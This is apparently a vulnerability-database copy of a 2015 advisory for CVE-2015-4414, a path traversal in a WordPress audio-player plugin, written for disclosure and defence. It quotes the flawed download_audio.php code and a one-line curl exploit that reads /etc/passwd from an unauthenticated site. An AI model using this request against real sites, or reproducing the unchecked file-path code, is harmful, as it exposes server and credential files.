Lucene search
Larry W. CashdollarPACKETSTORM:132266HistoryJun 11, 2015 - 12:00 a.m.
WordPress SE HTML5 Album Audio Player 1.1.0 Directory Traversal
2015-06-1100:00:00
Larry W. Cashdollar
packetstormsecurity.com
24
EPSS
0.125
Percentile
95.5%
`Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
This vulnerability doesnβt require authentication to the Wordpress site.
File ./se-html5-album-audio-player/download_audio.php:
3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8 // required for IE
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }
10
11 // get the file mime type using the file extension
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13 case 'pdf': $mime = 'application/pdf'; break;
14 case 'zip': $mime = 'application/zip'; break;
15 case 'jpeg':
16 case 'jpg': $mime = 'image/jpg'; break;
17 default: $mime = 'application/force-download';
18 }
19 header('Pragma: public'); // required
20 header('Expires: 0'); // no cache
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23 header('Cache-Control: private',false);
24 header('Content-Type: '.$mime);
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26 header('Content-Transfer-Encoding: binary');
27 header('Content-Length: '.filesize($file_name)); // provide file size
28 header('Connection: close');
29 readfile($file_name); // push it out
30 exit();
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
CVEID: 2015-4414
OSVDB:
Exploit Code:
β’ $ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
`
Related
wpexploit
wpexploit
SE HTML5 Album Audio Player <= 1.1.0 - Local File Include
2015-06-06 00:00:00
nvd
nvd
CVE-2015-4414
2015-06-17 18:59:08
zdt
zdt
prion
prion
Directory traversal
2015-06-17 18:59:00
cvelist
cvelist
CVE-2015-4414
2015-06-17 18:00:00
exploitdb
exploitdb
WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
2015-06-12 00:00:00
nuclei
nuclei
WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
2021-09-27 11:02:48
cve
cve
CVE-2015-4414
2015-06-17 18:59:08
wpvulndb
wpvulndb
SE HTML5 Album Audio Player <= 1.1.0 - Local File Include
2015-06-06 00:00:00
openvas
openvas